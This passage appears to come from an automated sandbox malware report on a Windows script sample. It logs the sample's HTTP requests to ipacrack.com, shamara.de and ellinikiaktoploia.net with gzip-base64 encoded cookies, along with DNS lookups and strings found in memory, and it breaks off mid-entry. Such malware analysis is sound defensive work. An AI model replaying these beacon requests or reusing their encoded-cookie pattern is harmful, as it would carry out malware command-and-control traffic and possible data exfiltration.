          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+RvUlNba+1u0lT5MPjNMAP8se+ZmZnXaXknenEYdxSF+AZWbLqRuvQDlkZjKdbxzAxlyB9wJiV7XhFWu9XgL2ErGBOHgkoqx6jWJrW2Xau2/qdv16bj/Tyqd2TzaqxHrLy3C2yLQSk612NIREwu2XFW987A3Vxdz7gfiydhBcgPoH3We1hcCx0LdkYxQV4IDwvizV0ZE5VSlkx0FQkir4eKPwBFoHNnIAcRPNzMLvVKYeOhA0BxKVYvHFC9DwVopRZC3H8R57MytZXFgi/UYOIi0OROMAsTUyjrPiLi+WticdhOfboopbyc/c348e2qR6rXUmC29GkNwVaTLkk36ACH3KvAQAA; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: www.shamara.deConnection: Close
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ellinikiaktoploia.netConnection: Close
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAkg1KJ644joeC7EVGY9hOkfedYrW145gf+NElKyYSwSB1hSF+KUVvzFhvLWxOFYjz3aIFP5ufub8WPfNY/NriTe7miWm29yk1ZQpgEAAA==; 6F48217DA82=H4sIAAAAAAAEAO3XQQ6CMBCF4asMB9A7kCYgGtyUxOiCBHHEGug07RjRcHi1iZGVJ5jte98F/tS53rQNG7KZbwZcUeBaI7OxXZiSbFSl2ofnpji49VWb/FRv8Q5Vc4QF5ERdj6AungYUK1asWLFixYoVK1as2P9WPwLj8O2NWXhUOHJh3Y1jkJSm9RTozPDZIR6Q/tJlSnbGaiaPy/c643F7ARQ/LMrkDAAA; 6F48217DA83=H4sIAAAAAAAEAF2Sy3KDIBiFX4W8gJPLpl2qIIkaxQuSuCOGJDRUHONM05k+fLHGMemO73A4cP5hkV/kDRD3Z7ZIRfVdKQEcWRtydd21WgHCa6EMc3XS9c0sQnloeSuFWa/+myLRfen2+jNbOn7pEcJsklufzepVaI6nV+Gubvf+yjIJMgi3LDUAKYU5dUqPGe8E1kdzNrsIYbaj64JiszuBddTV/VUZspfIi/eeE4c7e0h4FkZLzNKCJK6bPV6IWOkWOIpZPp6ZhL9Sc3Sv+t5LnO5KGAQFdKym7p1mprIDSpy5Ap0GV6kU4KARvNLVFcgaVFzJk25rycH76u3t3froZ+tDuN4SF1LfQBBuSpptEhT1U/diEkNcxOt+zAUrbZJkSWiummBs/6QMRaL91qSizdYe3r0gdphi6haoT8uSzA+Qw2BurBOMaXkCPX9N6IY+upUYB1FGg5gMwtw+6oMAdtXqA+8Me7IVJ23OzrHWZ/Oj3EurP8Uv1FLTqGsCAAA=; 6F48217DA84=H4sIAAAAAAAEAHOOMzIwNjY0NzYwMjI3BgDLc3kODgAAAA==Host: ipacrack.comConnection: Close
          Source: global trafficDNS traffic detected: DNS query: www.shamara.de
          Source: global trafficDNS traffic detected: DNS query: ipacrack.com
          Source: global trafficDNS traffic detected: DNS query: ellinikiaktoploia.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 27 Aug 2024 20:52:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 27 Aug 2024 20:52:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0.30000000000000004.com/
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
          Source: wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909F41D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: wscript.exe, 00000000.00000003.2004703451.000002909D61D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.0000029097F1B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909751B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2007631629.000002909891B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A0611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A1A11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2004703451.000002909E01D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2010533666.00000290A2411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 